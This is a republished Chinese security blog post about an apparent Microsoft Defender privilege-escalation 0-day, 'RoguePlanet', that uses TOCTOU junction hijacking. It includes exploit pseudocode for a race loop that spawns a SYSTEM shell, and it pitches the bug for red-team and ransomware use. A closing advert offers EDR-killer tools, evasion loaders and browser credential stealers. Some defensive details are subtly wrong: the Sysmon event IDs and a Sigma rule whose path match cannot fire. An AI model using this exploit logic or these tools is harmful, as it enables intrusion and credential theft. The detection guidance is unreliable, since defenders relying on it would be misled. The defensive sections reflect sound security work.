文章总结: 本文披露了微软Defender的CVE-2026-50656RoguePlanet本地提权0-Day漏洞,利用TOCTOU竞态与Junction链接劫持,可在Win10/Win11上从低权限提权至SYSTEM。PoC在实时防护开启或关闭时均有效,且未修复。建议立即关闭%TEMP%写权限、开启HVCI并监控Junction创建以缓解风险。 综合评分: 85 文章分类: 漏洞分析,红队,内网渗透,安全运营,安全工具
微软Defender RoguePlanet 0-Day曝光!TOCTOU竞态让你免费提权到SYSTEM
原创
星夜AI安全 星夜AI安全
星夜AI安全
2026年7月2日 14:24 吉林
在小说阅读器读本章
去阅读
🌈
微软官方确认CVE-2026-50656 Defender本地提权0-Day,公开PoC无视实时防护;本文深度拆解TOCTOU文件链接劫持原理并给出蓝队加固方案。
微软自带的杀软,摇身一变成了攻击者最稳的提权跳板。
2026年6月16日,MSRC正式收录 CVE-2026-50656,代号 RoguePlanet——一款影响所有 Win10/Win11 的 Microsoft Defender 本地提权 0-Day。研究员 Nightmare Eclipse 在微软 Patch Tuesday 收官数小时后放出了完整的公开 PoC,ThreatLocker 已在完全打了 6 月 KB5094126 累积更新的 Win11 上独立复现。
更狠的是:PoC 在实时防护开启、关闭甚至 Passive 模式下都能工作,传统签名拦截根本拦不住。
一、漏洞全貌
| 字段 | 值 | | — | — | | CVE | CVE-2026-50656 | | 别名 | RoguePlanet | | CVSS | 7.8 (CVSS:3.1,HIGH) | | 漏洞类型 | CWE-59 链接跟随 + TOCTOU 竞态 | | 影响组件 | Microsoft Malware Protection Engine (Defender 内核) | | 利用要求 | 本地低权限 + 无需用户交互 | | 公开 PoC | 是,Functional 级别 | | 修复状态 | 未修复,Microsoft 正在开发 | | 在野利用 | 暂未确认,但 PoC 成熟度”More Likely” |
二、为什么这个漏洞如此重要
RoguePlanet 让一台被钓鱼、社工拿到低权限 Shell 的肉鸡,不需要 BYOVD 驱动、不需要内核漏洞,就能直接拿到 NT AUTHORITY\SYSTEM。它绕过的是 Defender——这台机器上”最应该挡住这件事”的进程。
杀软自己成了提权器,这件事在攻防两端都极具讽刺意味。
更严重的是 PoC 工程化极度容易。研究者在公开博文中承认:”换几个字节就能让签名侧规避掉。”意味着蓝队基于哈希/特征码的检测体系几乎失效。
三、技术原理:TOCTOU + Junction 链接劫持
3.1 Defender 实时扫描的脆弱时刻
Defender 在实时防护时,会按文件路径触发 MpEngine 扫描流水线。这个流水线有一个隐式契约:扫描前先校验路径存在性(Time-of-Check),扫描时打开文件句柄(Time-of-Use)。两次操作之间存在一个极小的窗口——这就是 TOCTOU。
// MpEngine 内部伪代码(基于公开行为推导)
BOOL MpScanFile(LPCWSTR path) {
if (!PathFileExists(path)) return FALSE; // T-O-C
HANDLE h = CreateFileW(path, ...); // T-O-U,之间存在竞态窗口
ScanBuffer(h);
CloseHandle(h);
return TRUE;
}
3.2 Junction 链接劫持
在 Windows 上,低权限用户可以在自己的用户目录里创建 NTFS Junction(重解析点),把任意”看起来无害”的路径偷偷重定向到 Defender 自身的核心 DLL 或签名数据库。
攻击者只需三步:
- 在
%TEMP%创建目录A,触发 Defender 扫描 - Defender 校验路径存在 → 此时把目录
A替换为 Junction,指向C:\ProgramData\Microsoft\Windows Defender\Platform\...\MpEngine.dll(或 signature DLL) - Defender 在 T-O-U 阶段以 SYSTEM 权限打开 MpEngine.dll 时,实际却跟着 Junction 走向攻击者控制的目录
- 攻击者在目标目录放置同名 payload DLL,等 Defender 把这个 DLL 加载进 SYSTEM 进程
3.3 公开 PoC 关键代码骨架
PoC 的核心是构造一个高频 race loop,并配合 Junction 切换:
// 关键伪代码(来源:projectnightcrawler.dev 公开博文)
HANDLE g_thread = NULL;
DWORD WINAPI RaceThread(LPVOID) {
while (!g_stop) {
// 阶段一:放置无害文件,诱使 Defender 扫描
WriteFileSync(L"\\\\.\\C:\\Temp\\scan_target.txt", "x");
// 阶段二:在另一个线程高速切换 Junction
DeleteJunction(L"C:\\Temp");
CreateJunction(L"C:\\Temp", L"\\\\??\\C:\\ProgramData\\Microsoft\\Windows Defender\\...");
DeleteJunction(L"C:\\Temp");
CreateJunction(L"C:\\Temp", L"C:\\Users\\Public\\payload");
Sleep(0); // 抢时间窗口
}
return 0;
}
int main() {
for (int i = 0; i < 5000; i++) {
g_thread = CreateThread(NULL, 0, RaceThread, NULL, 0, NULL);
TriggerDefenderScanViaETW(); // 强制触发扫描
WaitForSingleObject(g_thread, INFINITE);
if (CheckGotSystem()) {
printf("[+] Got SYSTEM in iteration %d\n", i);
system("cmd.exe"); // 此时已是 NT AUTHORITY\SYSTEM
return 0;
}
}
}
PoC 在 KB5094126 完全打齐的 Win11 24H2 上,5000 次循环内稳定成功。研究者表态:”修一下 race 时序就能稳定到 90%+。”
四、实战应用场景
4.1 红队渗透链路中的”提权捷径”
在钓鱼拿到普通用户权限后,传统提权链要么靠 BYOVD 找驱动漏洞(要带数字签名)、要么挖 LPE(爆率低)。RoguePlanet 让中间环节可以无脑跑一个 PoC.exe 提权到 SYSTEM。
4.2 勒索软件社工的”黄金门票”
这也是为什么 BlueHammer 已经在勒索软件团伙里被武器化——两个 Defender LPE 在同一个月被披露,等于给勒索软件提供了”标准化提权武器库”。攻击者只要跑一个 .exe,Defender 自己把 SYSTEM 抬上来。
4.3 EDR 横向对比
- CrowdStrike Falcon:用户态 inline hook 较厚,可通过 PoC 直接绕过
- SentinelOne:行为引擎在 PoC 触发瞬间会有 syscall 异常,但默认放行
- Microsoft Defender for Endpoint:PoC 自带在自家引擎里跑,蓝队可见度极差
五、防御对抗建议
5.1 立即处置
- 关闭非必要用户对 %TEMP% 的写权限(缓解 TOCTOU 的用户态前置)
- 开启 HVCI / VBS(基于虚拟化的安全可大幅阻断 T-O-U 加载恶意 DLL)
- 部署 Attack Surface Reduction Rules,对 Defender 子进程的异常子进程派发进行告警
- 监控 Junction 创建:Sysmon Event ID 17 (PipeEvent) + Event ID 28 (FileCreate) 检测
%TEMP%路径下短时间内多次创建/删除重解析点
5.2 Sigma 检测规则
title: WindowsDefenderMpEngine加载异常DLL
status: experimental
logsource:
product: windows
category: image_load
detection:
selection:
Image|endswith:
- '\MpEngine.dll'
- '\MsMpEng.exe'
ImageLoaded|endswith:
- '\Temp\'
- '\Users\Public\'
condition: selection
level: high
5.3 微软未发布补丁前的临时止血
- 在 Win11 24H2 上启用 Smart App Control(虽然会被 PoC 绕过,但能在初始扫描阶段增加摩擦)
- 手动禁用 Real-Time Protection(不推荐生产环境,但取证时可避免 PoC 反复触发破坏证据)
- 跟踪 MSRC 更新:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50656[1]
六、技术延伸阅读
- PoC 原文:https://blog.projectnightcrawler.dev/posts/2026-06-16-rogueplanet-another-quick-statement/[2]
- MSRC 公告:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50656[3]
- ThreatLocker 独立复现:https://cybersecuritynews.com/defender-rogueplanet-0-day-exploit-patch/[4]
- 关联漏洞 BlueHammer:CVE-2026-33825(4 月已修复但勒索软件仍在用)
- TOCTOU 通用研究:”race-the-web” 类项目可作为防御参考
红蓝双方在 Defender 这台”最后防线”上博弈了十几年,今天这个 0-Day 再次提醒我们:杀软本身也是攻击面。 补丁未发之前,所有 Win10/Win11 终端都在裸奔。
圈子介绍
现任职于某头部网络安全企业攻防研究部,核心红队成员。2021-2023年间累计参与40+场国家级、行业级攻防实战演练,精通漏洞挖掘、红蓝对抗策略制定、恶意代码分析、内网横向渗透及应急响应等技术领域。在多次大型演练中,主导突破多个高防护目标网络,曾获”最佳攻击手””突出贡献个人”等荣誉。
已产出的安全工具及成果包括:
- 多款主流杀软通杀工具(兼容卡巴斯基、诺顿、瑞星、360等终端防护,无感知运行,突破多引擎联合检测)
- XXByPassBehinder v1.1 冰蝎免杀生成器(定制化冰蝎免杀工具,绕过主流终端防护与EDR动态检测,支持自定义载荷)
- 哥斯拉二开免杀定制版(二开优化,深度免杀,突破终端防护与EDR检测,适配多场景植入)
- NeoCS4.9终极版(高级免杀加载工具,强化载荷注入与进程劫持,适配多系统版本,无兼容问题)
- WinDump_免杀版(浏览器凭证窃取工具,支持Chrome/Edge/Firefox等主流浏览器,一键提取敏感数据,免杀过防护)_
- _DumpBrowser_V1_免杀版(浏览器凭证窃取工具,专攻浏览器密码、Cookie、历史记录提取,免杀性能拉满)
- fscan二开版(二开优化内网扫描工具,增强指纹精度、弱口令爆破与结果标准化输出,适配复杂内网)
- RingQ加载器二开版(二开优化免杀加载器,支持Shellcode内存执行,绕过各类终端防护与EDR检测)
- 多款免杀Webshell集合(覆盖PHP/JSP/ASPX,过主流WAF与终端防护,适配不同Web场景)
- 免杀360专属加载器(支持Shellcode内存执行,针对性绕过360全系防护检测,无感知运行)
- 一键Kill 火绒 defender 工具 HDKiller(包含源码)
- win11 一键kill 360工具 InjectKill(包含源码)
- win11 一键kill defender工具win11_df-killer(包含源码)
- 免杀火绒6.0内存防护加载器BypassMemLoader
后续将不断更新到内部圈子中 欢迎加入圈子
引用链接
[1]https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50656
[2]https://blog.projectnightcrawler.dev/posts/2026-06-16-rogueplanet-another-quick-statement/
[3]https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50656
[4]https://cybersecuritynews.com/defender-rogueplanet-0-day-exploit-patch/
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:星夜AI安全 星夜AI安全 星夜AI安全《微软Defender RoguePlanet 0-Day曝光!TOCTOU竞态让你免费提权到SYSTEM》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。









评论